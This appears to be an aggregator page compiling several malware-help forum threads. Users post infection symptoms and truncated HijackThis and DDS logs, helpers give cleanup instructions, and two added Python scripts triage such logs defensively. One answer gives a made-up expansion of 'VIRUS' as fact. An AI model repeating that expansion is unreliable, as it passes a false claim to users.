Computer Support Forum

Computer compromised with virus or some form of malware

Question: Computer compromised with virus or some form of malware

Our system seemed to act strangely beginning in early March. We use ZoneAlarm firewall and it seemed to automatically lock on occasion upon log-in, requiring a manual "un-lock" before the internet could be used. I was suspicious there was something trying to get in or out that ZoneAlarm was "catching" and locking the firewall.

To try to detect the problem, I downloaded the latest version of "MalwareBytes" and ran a scan. It found a few issues and I chose to quarantine a few of them, but not all as some looked legitimate to me.

Upon re-booting the next time, everything went bad. A pop-up came up with the windows installer and then it said it was trying to install HPPhotosmartEssential. The system became very sluggish and the hard drive was constantly being accessed. After numerous "Cancels" to the install, it finally stopped trying to install. However, the hard drive continued to be accessed non-stop and the system was very slow. I became very concerned something was going on in the background so I shut the system down.

I tried to re-boot in safe mode and it would not boot, it either hung or gave a disk error suggesting c:\windows\system32\wbem was corrupt or unreadable and chkdsk should be run. I immediately felt I needed to do a system restore back a couple of weeks to clear off the issues. Upon trying to run the restore I received a message that the application failed to start because framedyn.dll was not found and that re-installing the application may fix the problem. At this point I aborted any further work from the standard windows boot process.

I have a wonderful "Windows Ultimate Boot CD" that allows me to boot to WinXP and mount my disks to interrogate. From then on I booted from this CD with a "thin client of WinXP". I tried to open the c:\windows\system32\wbem folder and it stated it was corrupt and unreadable.

To alleviate any potential for further damage I spent the next few days looking at my primary hard drive (c:\) for missing or suspicious info. What I almost immediately found was MANY missing photos in "My Pictures" and I became very concerned. I then started looking for software that could interrogate a hard drive and find deleted files. I tried a couple of utilities that gave me nothing hopeful. I then tried "Handy Recovery" and my best wishes came true and the missing files showed up in the listing. I proceeded to recover almost 12 GB of pictures to a backup hard drive! After I finished recovering files with "Handy Recovery", I copied many personal data files to my backup hard drive (f:\).

I then ran the chkdsk utility with the command, "chkdsk c:/r" at which time MANY issues were found and corrected. After the utility finished I looked at my personal data on c:\ again and most if not all of the pictures that were missing were shown again??? I was encouraged at this so tried to open the c:\windows\system32\wbem folder again and it opened. The missing framedyn.dll file was back in the directory.

At this, I became optimistic and re-booted to the standard windows boot on c:\ and tried to run a system restore to March 1, 2010. This time the application started and I was given the standard interface to choose a date, which I did. I chose Next and it began to do a restore but about 1/3 to 1/2 of the way through the restore (based on the "growing bar") it rapidly filled in the rest of the bar and did the standard re-boot. Upon re-booting and logging in, the system restore dialog popped up and said that the restore failed.

I tried one more time to Feb. 23rd and it failed. I then tried two more times when booting to Windows safe mode and both failed.

At that point I realized I would need more expert advice to avoid having to re-format and re-load everything. That brought me here.


To Whom it may concern,

Thank you for your attention. I woke up this morning to find that my computer was telling me that I have NO HARD DRIVE SPACE AVAILABLE, HARD DRIVE CLUSTERS ARE DAMAGED, HARD DRIVE SPEED OPERATING AT 20%, and I am not able to use Windows at all, and a pop-up window telling me that I must run a system check. I did. That resulted in a message telling me that I had 8 infected files and telling me to click a link to fix. I did not click this one. It looks fake. I instead ran the "Malwarebytes" program. It showed 16 infections and I quarantined them; however, it was not able to quarantine them all.

I am unable to zip the file you requested because I cannot access WinZip at the moment. I obviously have a major malware problem but I need your help in order to try and fix this problem. The names of the viruses/trojans are in the attached files labelled "mbam-log" and "protection log". Please do not hesitate to contact me if you need any other information.

I do not have access to windows boot disc, or Boot CD.

Thank you very much!

Carrey Sandera

.
DDS (Ver_2011-08-26.01) - NTFSAMD64
Internet Explorer: 8.0.7600.16385
Run by Thomas at 11:30:43 on 2011-12-20
Microsoft Windows 7 Home Premium 6.1.7600.0.1252.1.1043.18.4063.2152 [GMT 1:00]
.
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
============== Running Processes ===============
.
C:\Windows\system32\wininit.exe
C:\Windows\system32\lsm.exe
C... Read more


My wordpress blog was hacked. My host (hostgator) confirmed that someone had gained FTP access, and said the likely suspect was a virus or malware that had located the FTP details on my computer. I'm not convinced that this is the case because I have several other accounts with Hostgator that have not been hacked and I keep those FTP details on my computer as well. I'm also pretty careful with security and run malware/adware checks once a week. It seems more likely that I've forgotten to change my FTP log-in after allowing a programmer access and they have misused it (or have a virus themselves).

Anyway, since I'm hardly an expert, I've run the scans recommended by Hostgator, one of which is ComboFix. Combofix did its thing without any problems and generated a log file, but Hostgator said they weren't best placed to advise me in interpreting the log file. They pointed me to this forum instead. Since it says above not to post a combofix log straight away, I'll wait for a request from this thread before posting it. I have however posted the images of the other scans I ran, in addition to combofix, below. They found and deleted a couple of files they defined as trojans, but these are just browser toolbar apps for some marketing programs. They're in a zip file, I've never installed them, and they've been on my hard drive for years. I don't think there's anything useful in there, but I've included them just in case. If anyone ... Read more

Answer:FTP Details Compromised - My Host Suspects Malware/Virus

Hello David and welcome to Bleepingcomputer. From what you've provided, this doesn't appear to be a malware issue. Many hosts and ISPs (and even some tech support people) tend to throw around words such as virus or malware. If you have doubts, it's always good to get a second opinion from a specialist (which you're doing, so Good Job!). Still, let's run a couple of additional scans. Better safe than sorry, right?

Before we begin though, a caution and a question.

First, as you've undoubtedly read by now, ComboFix (CF for short) is a highly advanced tool designed to be used only at the direction of a highly trained specialist. The truth is, CF can cause enormous amounts of damage if used incorrectly, and sometimes can cause rather serious side effects even when used in the correct manner. When you're working with a specialist trained in the use of CF these side effects can be dealt with if they arise, but the fact that the folks at hostgator were unable (or unwilling) to analyze the log after recommending the tool to you is somewhat indicative that they probably didn't know exactly what they were handing you. I'm very glad that you seem to have come out of it unscathed, and I've notified the author of the tool about what has happened in case he sees the need to take further action. But I digress. Please do not run CF again unless someone trained in malware removal asks you to.

Secondly, are you experiencing any other symptoms t... Read more


I was on AIM doing my usual thing until I received a message from my friend. It had some weird URL that made me suspicious, but being the idiot that I am I clicked it and ran some file. Norton Antivirus instantly flagged it as a virus and did auto-repair, which didn't work. In Norton's log viewer it has 2 entries, here's a pic. I've run the full system scan option and nothing turned up. I've also run the antivirus software that you guys recommended (except for Panda Antivirus) and nothing turned up. I haven't run Norton in safe mode yet, but I'm going to in a bit. My question is, is my computer still infected?

Here's my HijackThis log:

Logfile of HijackThis v1.99.1
Scan saved at 2:35:16 AM, on 7/13/2006
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Symantec\LiveUpdate\ALUSchedulerSvc.exe
C:\Program Files\Common Files\Symantec Shared\ccProxy.exe
C:\Program Files\Common Files\Symantec Shared\ccSetMgr.exe
C:\Program Files\Executive Software\Diskeeper\DkService.exe
C:\Program Files\Norton Internet Security\ISSVC.e... Read more

Answer:[email protected] Virus Compromised My Computer.

Hello TranNova and welcome to the BC HijackThis forum. I do not see any signs of that in the log but it probably wouldn't show up there anyway. HJT does not scan the temp folders. Norton should have taken care of the file by quarantining it, or one of the scanners should have picked it up if it was still there. Since it was downloaded to the temp folders you can clean those out rather quickly.

Download and install ATF Cleaner by Atribune. This program is for XP and Windows 2000 only.
Double-click ATF-Cleaner.exe to run the program.
Under Main choose: Select All
Click the Empty Selected button.
If you use Firefox browser: click Firefox at the top and choose: Select All. Click the Empty Selected button.
NOTE: If you would like to keep your saved passwords, please click No at the prompt.
If you use Opera browser: click Opera at the top and choose: Select All. Click the Empty Selected button.
NOTE: If you would like to keep your saved passwords, please click No at the prompt.
Click Exit on the Main menu to close the program.
For Technical Support, double-click the e-mail address located at the bottom of each menu.

There are a couple of questions I have though. Is the IE executable in the C:\My Files\Website\Browsers\ folder for a reason? If you put it there that is fine. If you didn't, then we might want to check that file out. Also, the file Cleaner.bat might or might not be questionable. If you know what it is and have it set to run on startup then it's OK. If not, then we should d... Read more
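The question the helper ends on (is an iexplore.exe under C:\My Files\Website\Browsers\ there for a reason?) is a path check that can be run mechanically over the whole "Running processes" section of any of the HijackThis and DDS logs posted in this thread, including the WoW keylogger logs further down. Below is an added example that does this in Python; it is not code from the forum, from HijackThis or from DDS. It assumes a stock single-drive Windows install (the TRUSTED_PREFIXES and EXPECTED_DIR tables are my assumptions, not anything the tools publish), and the sample log is constructed from paths that appear in the posted logs plus three hypothetical out-of-place entries.

```python
# Triage the "Running processes" section of a HijackThis or DDS log: flag
# executables that start from outside the usual Windows / Program Files
# trees, and core system binary names that appear in the wrong directory.
# Added example, not code from the thread. Assumes a single-drive Windows
# install with default directory names; adjust TRUSTED_PREFIXES otherwise.
import ntpath
import re

# Normal parent directories for a stock XP/Vista/7 install (lower-cased, no trailing slash).
TRUSTED_PREFIXES = (
    r"c:\windows",
    r"c:\program files",
    r"c:\program files (x86)",
    r"c:\progra~1",   # 8.3 short names, as HJT prints them for some entries
    r"c:\progra~2",
)

# Where the core Windows binaries must live; a same-named file elsewhere is a
# classic disguise (see the hypothetical Temp\svchost.exe and WINDOWS\lsass.exe below).
EXPECTED_DIR = {
    "smss.exe": r"c:\windows\system32",
    "csrss.exe": r"c:\windows\system32",
    "winlogon.exe": r"c:\windows\system32",
    "services.exe": r"c:\windows\system32",
    "lsass.exe": r"c:\windows\system32",
    "svchost.exe": r"c:\windows\system32",
    "spoolsv.exe": r"c:\windows\system32",
    "explorer.exe": r"c:\windows",
}

SECTION_HEADER = re.compile(r"^=*\s*running processes:?\s*=*$", re.IGNORECASE)
PROCESS_LINE = re.compile(r"^(?P<path>.*?\.exe)(?P<args>\s+.*)?$", re.IGNORECASE)


def extract_processes(log_text):
    """Return [(path, args)] from the Running processes section.

    HJT lists the paths directly under "Running processes:" and ends the block
    with a blank line; DDS pads its section with lone "." lines and may append
    "-k <group>" arguments to svchost instances. Both shapes are handled.
    """
    procs, in_section = [], False
    for raw in log_text.splitlines():
        line = raw.strip()
        if SECTION_HEADER.match(line):
            in_section = True
            continue
        if not in_section:
            continue
        if line in ("", "."):
            if procs:
                break          # first separator after the list ends the section
            continue           # leading padding before the first entry
        m = PROCESS_LINE.match(line)
        if m:
            procs.append((m.group("path"), (m.group("args") or "").strip()))
    return procs


def is_trusted_path(path):
    p = ntpath.normpath(path).lower()
    return any(p.startswith(prefix + "\\") for prefix in TRUSTED_PREFIXES)


def triage(log_text):
    """Return [(path, reason)] for every process entry worth a second look."""
    findings = []
    for path, _args in extract_processes(log_text):
        name = ntpath.basename(path).lower()
        parent = ntpath.normpath(ntpath.dirname(path)).lower()
        if not is_trusted_path(path):
            findings.append((path, "runs from outside the Windows / Program Files trees"))
        elif name in EXPECTED_DIR and parent != EXPECTED_DIR[name]:
            findings.append((path, f"system binary name outside {EXPECTED_DIR[name]}"))
    return findings


# Constructed sample in HijackThis format: real paths from logs posted in this
# thread, plus three hypothetical entries (the IE copy the helper asks about, a
# svchost.exe in a Temp folder, and an lsass.exe one directory too high).
SAMPLE_LOG = r"""Logfile of HijackThis v1.99.1
Scan saved at 2:35:16 AM, on 7/13/2006
Platform: Windows XP SP2 (WinNT 5.01.2600)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe -k netsvcs
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Common Files\Symantec Shared\ccProxy.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\lsass.exe
C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe
C:\My Files\Website\Browsers\iexplore.exe
C:\DOCUME~1\TranNova\LOCALS~1\Temp\svchost.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
"""

if __name__ == "__main__":
    for path, reason in triage(SAMPLE_LOG):
        print(f"{path}: {reason}")
```

A hit only means "look at this file"; the follow-up is the same set of questions the helper asks (did the user put it there, is it signed, does the name match an installed product). The 8.3 short names (PROGRA~1, DOCUME~1) are normal in these logs and are not a signal on their own.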


Hi.
First I would like to thank you for helping me with my problem... It really means a lot to me that there are people around the world willing to help other people, even though they don't know each other...

My WoW account has recently been hacked and I think that it might be a keylogger or a trojan virus... The hacker has somehow been able to get my account name and password.

I have been following a keylogger cleaning guide on the official WoW forum... I have downloaded several anti-virus programs and done as the guide told me to do... The last checkpoint in the guide was to post a thread on this site with a HijackThis log, and that's what I'm doing now.

So here's the log:

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 22:20:34, on 12-09-2009
Platform: Windows Vista (WinNT 6.00.1904)
MSIE: Internet Explorer v7.00 (7.00.6000.16890)
Boot mode: Normal

Running processes:
C:\Windows\system32\taskeng.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Program Files\Windows Defender\MSASCui.exe
C:\Windows\RtHDVCpl.exe
C:\Program Files\Fingerprint Sensor\ATSwpNav.exe
C:\Program Files\Common Files\Symantec Shared\ccApp.exe
C:\Program Files\ScanSoft\OmniPageSE4.0\OpWareSE4.exe
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
C:\Program Files\SteelSeries\World of Warcraft MMO Gaming Mouse\WoWMHID.exe
C:\Program Files\Ideazon\ZEngine\Zboard.exe
C:\Program Files\Lexmark 3600-4600 Series\lxdxmon.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\... Read more


Good day to you! First of all thanks for looking into my problem, its much appreciated!

My WoW account has been compromised twice in the last week by hackers who were able to get hold of my password. It is suspected that I have a keylogger or trojan virus on my computer.
Following a virus removal guide on the official WoW forums, I have used several programs like MBAM, Spybot, Avast, Ad-Aware and Kaspersky to try and get rid of the problem. The last checkpoint on the list was to post a HijackThis log on this site to hopefully verify that my account is clean. If you could have a look at my log it would be great.

Thanks a lot!

Hijackthis log:

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 1:35:10 PM, on 9/6/2009
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Boot mode: Normal

Running processes:
C:\windows\System32\smss.exe
C:\windows\system32\winlogon.exe
C:\windows\system32\services.exe
C:\windows\system32\lsass.exe
C:\windows\system32\svchost.exe
C:\windows\System32\svchost.exe
C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
C:\Program Files\Lavasoft\Ad-Aware\AAWService.exe
C:\Program Files\Alwil Software\Avast4\ashServ.exe
C:\windows\Explorer.EXE
C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe
C:\windows\RTHDCPL.EXE
C:\Program Files\Java\jre6\bin\jusched.exe
C:\windows\system32\RUNDLL32.EXE
C:\Program Files\Lavasoft\Ad-Aware\AAWTray.exe
C:\Program Files\Telenor\Telenorhjelpen\Telenor.exe
C:\Program Files\Logitech\Deskto... Read more

Answer:My computer compromised by a keylogger and/or a trojan virus.


Hello.

I'm new here. I have been looking for information about 2 applications called "Home Cloud" and "Form1".
When I go to my Alt+TAB menu I can see these applications there, but I can't access them.
Also in my Task Manager I can see both applications.
I don't know why they are running or what these applications do.
It could be something normal, but since I'm a noob at these things I can't tell whether they are malware or not.

Can anyone explain to me what these applications are for and why they are on my PC?
Can I remove them both, or are they some kind of essentials for my PC?

I got a capture of my Alt+TAB menu:
The selected one is Home Cloud, the one on the right is Form1.

Regards and thanks.

Answer:Home Cloud + Form 1, Malware? Virus?

I'm moving this to appropriate forum.


My email address has been compromised by a spam bot. Computer is also acting very slow. AVG scans showing nothing, although I feel certain there is some sort of Malware on this computer.
DDS (Ver_10-12-12.02) - NTFSx86
Run by jean at 0:03:58.75 on 02/02/2011
Internet Explorer: 7.0.6001.18000 BrowserJavaVersion: 1.6.0_15
Microsoft® Windows Vista™ Home Basic 6.0.6001.1.1252.1.1033.18.1013.228 [GMT 0:00]

AV: AVG Internet Security 2011 *Enabled/Updated* {5A2746B1-DEE9-F85A-FBCD-ADB11639C5F0}
SP: AVG Internet Security 2011 *Enabled/Updated* {E146A755-F8D3-F7D4-C17D-96C36DBE8F4D}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: AVG Firewall *Enabled* {621CC794-9486-F902-D092-0484E8EA828B}

============== Running Processes ===============

C:\PROGRA~1\AVG\AVG10\avgchsvx.exe
C:\Windows\system32\wininit.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k rpcss
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\SLsvc.exe
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\System32\spoolsv.exe
C:\Windows&... Read more

Answer:Email address compromised. Computer acting strangely. Unsure of virus name.

Hello and welcome to Bleeping Computer. We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.

If you have since resolved the original problem you were having, we would appreciate you letting us know. If not, please perform the following steps below so we can have a look at the current condition of your machine. If you are unable to create a log because your computer cannot start up successfully, please provide detailed information about the Windows version you are using: what we in particular need to know is version, edition and if it is a 32bit or a 64bit system. If you are unsure about any of these characteristics, just let us know and we'll help you figure it out. Please also tell us if you have your Windows CD/DVD handy. Please include a clear description of the problems you're having, along with any steps you may have performed so far. Please refrain from running tools or applying updates other than those we suggest while we are cleaning up your computer. The reason for this is so we know what is going on with the machine at any time. Some programs can interfere with others and hamper the recovery process. Even if you have already provided information about y... Read more
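The first thing a helper reads in a DDS log is the AV:/SP:/FW: header above the process list: the Vista log in this post shows Windows Defender as *Disabled/Updated* next to an enabled AVG suite, and the Windows 7 log earlier in the thread lists only an SP (antispyware) entry with no AV line at all. The following is an added example, not code from the thread or from DDS, that parses that header and reports protection which is disabled, out of date, or not registered. The two sample headers are constructed in the DDS format shown in the posts, with product names and GUIDs copied from the posted logs; the "no antivirus" check is my own rule, not something DDS reports.

```python
# Read the product-state header that DDS prints above its process list and
# report protection that is disabled, out of date, or absent altogether.
# Added example, not code from the thread or from DDS. Sample headers below are
# constructed in the DDS format shown in the posts.
import re

PRODUCT_LINE = re.compile(
    r"^(?P<kind>AV|SP|FW):\s+(?P<name>.+?)\s+\*(?P<state>[^*]+)\*"
    r"(?:\s+\{(?P<guid>[0-9A-Fa-f-]+)\})?\s*$"
)
KIND_LABEL = {"AV": "antivirus", "SP": "antispyware", "FW": "firewall"}


def parse_products(log_text):
    """Return one dict per AV:/SP:/FW: line.

    The state field reads 'Enabled/Updated', 'Disabled/Outdated' and so on;
    firewall lines carry only the first half, so 'updated' is None for them.
    """
    products = []
    for line in log_text.splitlines():
        m = PRODUCT_LINE.match(line.strip())
        if not m:
            continue
        parts = m.group("state").lower().split("/")
        products.append({
            "kind": m.group("kind"),
            "name": m.group("name"),
            "enabled": parts[0] == "enabled",
            "updated": (parts[1] == "updated") if len(parts) > 1 else None,
            "guid": m.group("guid"),
        })
    return products


def assess(log_text):
    """Return human-readable issues; an empty list means every listed product
    is enabled and current and at least one antivirus is registered."""
    products = parse_products(log_text)
    issues = []
    if not any(p["kind"] == "AV" for p in products):
        # Security Center knows of no antivirus: uninstalled, unregistered, or
        # switched off far enough that it no longer reports (check by hand).
        issues.append("no antivirus registered with Security Center")
    for p in products:
        label = f"{p['name']} ({KIND_LABEL[p['kind']]})"
        if not p["enabled"]:
            issues.append(f"{label} is disabled")
        if p["updated"] is False:
            issues.append(f"{label} has outdated definitions")
    return issues


# Constructed from the Vista log posted above: AVG enabled, Windows Defender disabled.
VISTA_HEADER = """\
AV: AVG Internet Security 2011 *Enabled/Updated* {5A2746B1-DEE9-F85A-FBCD-ADB11639C5F0}
SP: AVG Internet Security 2011 *Enabled/Updated* {E146A755-F8D3-F7D4-C17D-96C36DBE8F4D}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: AVG Firewall *Enabled* {621CC794-9486-F902-D092-0484E8EA828B}
"""

# Constructed from the Windows 7 log posted earlier: only Defender, no AV line at all.
WIN7_HEADER = """\
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
"""

if __name__ == "__main__":
    for name, header in (("Vista", VISTA_HEADER), ("Windows 7", WIN7_HEADER)):
        print(name, "->", assess(header) or ["nothing to report"])
```

Treat the output as a prompt for questions, not a verdict: a third-party suite commonly turns Windows Defender off on install, so "Windows Defender is disabled" beside an enabled AVG is often expected, whereas a missing AV line, or a product the owner believes is running but which shows *Disabled*, is exactly the situation a later poster in this thread describes with OfficeScan and is worth asking about before reading the rest of the log.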


Hello and thanks in advance for your time and help


A few weeks ago, my hotmail email account was hijacked and someone changed the password. I found this odd and did a full scan of my computer with AVG free and found nothing (I keep it updated regularly). Then I did a full scan with MalwareBytes and it found multiple things, which surprised me as I try and scan every download with AVG before opening them. Anyway, I must have messed up as somehow I ended up with trojans and viruses on my computer. I still have the Mbam report log from that scan that found problems.
In the meantime, I switched to an older computer I had that I knew was not infected and forgot about my main computer as my priority was to try and recover my hotmail account as that had years of work on it. That's now a lost cause and I am ready to go back to my main computer. But before I do that, I want to be sure that there are not any backdoor trojans, keyword loggers or anything else left on there as I have spent well over 100 hours dealing with new passwords, updating all related accounts yada, yada. I want to be sure that computer is safe before I begin using it again.

What should I do to be 100% certain, or as best as possible, to be sure that machine is now safe to use? I re-scanned it with Mbam and it came up clean. I believe I also ran AVG on it again; Trendmicro and Panda software online scans as well. I tried to run Dr Web, but their website was crashing when I tried to download the late... Read more

Answer:Computer compromised or coincidental to hotmail account being hijacked & virus found?


Welcome to Major Geeks!

Please read ALL of this message including the notes before doing anything.

Please follow the instructions in the below link:

READ & RUN ME FIRST. Malware Removal Guide
and attach the requested logs when you finish these instructions.
**** If something does not run, write down the info to explain to us later but keep on going. ****
Do not assume that because one step does not work that they all will not. MGtools will frequently run even when all other tools will not.

After completing the READ & RUN ME and attaching your logs, make sure that you tell us what problems still remain ( if any still do )!
Helpful Notes:

If you run into problems trying to run the READ & RUN ME or any of the scans in normal boot mode, you can run the steps in safe boot mode but make sure you tell us what you did later when you post logs. See the below if you do not know how to boot in safe mode:
Starting your computer in Safe mode

If you have problems downloading on the problem PC, download the tools and the manual updates for SUPERAntiSpyware and Malwarebytes ( links are given in the READ & RUN ME) onto another PC and then burn to a CD. Then copy them to the problem PC. You will have to skip getting updates if (and only if) your internet connection does not work. Yes you could use a flash drive too but flash drives are writeable and infections can sp... Read more


I have inadvertently allowed a malware that creates infinite popups and has hijacked my web browser. I am continuously redirected to their website offering to sell me a virus protection program. My son directed me to open in 'safe' mode and contact BleepingComputer. He thinks you can help someone as old as I am! I would appreciate any assistance; I have tried to follow your guide to complete the scans, etc. before posting for help.
Thanks,
Lynne

Answer:Malware in the form of popups claiming a virus infection

Hello and welcome to Bleeping Computer. We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here. If you have since resolved the original problem you were having, we would appreciate you letting us know. If not, please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far. Upon completing the steps below another staff member will review and take the steps necessary with you to get your machine back in working order, clean and free of malware. If you have already posted a DDS log, please do so again, as your situation may have changed. Use the 'Add Reply' and add the new log to this thread. Thanks and again sorry for the delay.

We need to see some information about what is happening in your machine. Please perform the following scan:
Download DDS by sUBs from one of the following links. Save it to your desktop.
DDS.scr
DDS.pif
Double click on the DDS icon, allow it to run.
A small box will open, with an explanation about the tool. No input is needed, the scan is running.
Notepad will open with the results.
Foll... Read more


Dear friends, what is the full form of computer 'VIRUS' ? If you give me the information I shall be highly obliged. With regards spdCHF.

Answer:Full form of computer VIRUS

VIRUS: Vital Information Resources Under Seize


For a few days now I've been experiencing extremely slow loading times upon startup, and whenever I try and open ANY application. My Windows XP loading screen on startup takes about 1-2 minutes to load, whereas before it only took ~10 seconds. My mouse has also begun freezing every few seconds, only momentarily. I've tried tonnes of AntiVirus, AntiSpyware, etc., but nothing has helped this problem (though I've gotten rid of a lot of problems I didn't know I had).

This is the first forum I've tried as it looks the most professional.

I've read through some other articles, and already made up a HijackThis file, in case it's needed, as is the case in most articles I've read:

Logfile of Trend Micro HijackThis v2.0.0 (BETA)
Scan saved at 09:52:20, on 19/07/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\SYSTEM32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.exe
C:\Program Files\Wirelwss LAN Utility\TIWLANCu.exe
C:\Program Files\Java\jre1.5.0_11\bin\jusched.exe
C:\Program Files\Winamp\winampa.exe
C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\avgas.exe
C:\PROGRA~1\Grisoft\AVG7\avgamsvr.exe
C:\PROGRA~1\Grisoft\AVG7\avgcc.exe
C:\PROGRA~1\PANICW~1\POP-UP~1\PSFree.exe
C:\P... Read more


This problem started with a pop-up window that says "antispyware 2009...." something; I thought it was a trap, so I closed it. Then, whenever I browse a web page, it pops up a new window showing another web page, and those pages are different each time. It happens on both IE7 and FF3. It also affects web email pages by slowing them down. Here is the HijackThis log. I am online most of the day and am able to respond quickly. Please help, thank you very much.

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 1:29:41 PM, on 11/29/2008
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16735)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\SYSTEM32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Windows Defender\MsMpEng.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\NavNT\defwatch.exe
C:\Program Files\NavNT\rtvscan.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\MsgSys.EXE
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\ctfmon.exe
C:\WINDOWS\SOUNDMAN.EXE
C:\WINDOWS\system32\igfxtray.exe
C:\WINDOWS\system32\hkcmd.exe
C:\Program Files\Windows Defender\MSASCui.exe
C:\Program Fil... Read more

Answer:New virus attack north america this week, any expert on this form be able to fix?/ Computer 2

thank you, please help!


My system may be compromised by malware/spyware/virus or whatever. Attached is my Hijackthis log. I would appreciate any help I can get. Thank you.

Answer:My system compromised by malware?

Welcome to Major Geeks!

Please follow the instructions in the READ & RUN ME FIRST link given further down and attach the requested logs when you finish these instructions.
If you have problems where no tools seem to run, please try following the steps given in the below and then continue on no matter what you find. You only need to try the TDSSserv steps if having problems getting scans in the Read & Run Me First.

TDSSserv Non-Plug & Play Driver Disable

If something does not run, write down the info to explain to us later but keep on going.
Do not assume that because one step does not work that they all will not.
READ & RUN ME FIRST. Malware Removal Guide


Helpful Notes:

If you run into problems trying to run the READ & RUN ME or any of the scans in normal boot mode, you can run the steps in safe boot mode but make sure you tell us what you did later when you post logs. See the below if you do not know how to boot in safe mode:
Starting your computer in Safe mode

If you have problems downloading on the problem PC, download the tools and the manual updates for SUPERAntiSpyware, Malwarebytes and Spybot ( links are given in the READ & RUN ME) onto another PC and then burn to a CD. Then copy them to the problem PC. You will have to skip getting updates if (and only if) your internet connection does not work. Yes you could use a flash drive too but flash drives are writeable and infections can spread to them.
To avoid additional delay in gettin... Read more


I have been having problems for a while now. My main concern is the popups I get randomly and the crawling speed of my computer. I have posted a log before, but nobody helped. I have also used Spybot to clean my computer, which did not work. Even HouseCall attempted to fix my computer - still nothing. Also, after implementing an account lockout procedure after 3 failed password attempts, my Administrator account was locked out this morning. Anyways, here is my HJT log:

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 12:54:48 AM, on 1/1/2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16574)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Bonjour\mDNSResponder.exe
c:\program files\dell printers\Additional Color Laser Software\Status Monitor\DLSDBNT.EXE
C:\Program Files\Media Center Diagnostic Kit\Tests\Bin\ehMonitor.exe
C:\WINDOWS\eHome\ehRecvr.exe
C:\WINDOWS\eHome\ehSched.exe
C:\Program Files\CA\eTrust Antivirus\InoRpc.exe
C:\Program Files\CA\eTru... Read more

Answer:Malware - System Compromised?

Welcome to the BleepingComputer HijackThis Logs and Analysis forum. My name is Richie and I'll be helping you to fix your problems. Apologies for the late response; as I'm sure you can appreciate, we are absolutely snowed under with logs. If you still require help, please post a new HijackThis log into your next reply.


Hello,
 
My credit card was somehow used fraudulently; luckily I found out right away and blocked it. The thing is I have no idea how this happened. It could be some sort of keylogger malware, is that correct?
I use on Windows 7 the latest version of F-Secure Internet Security as well as Malwarebytes but nothing was detected.
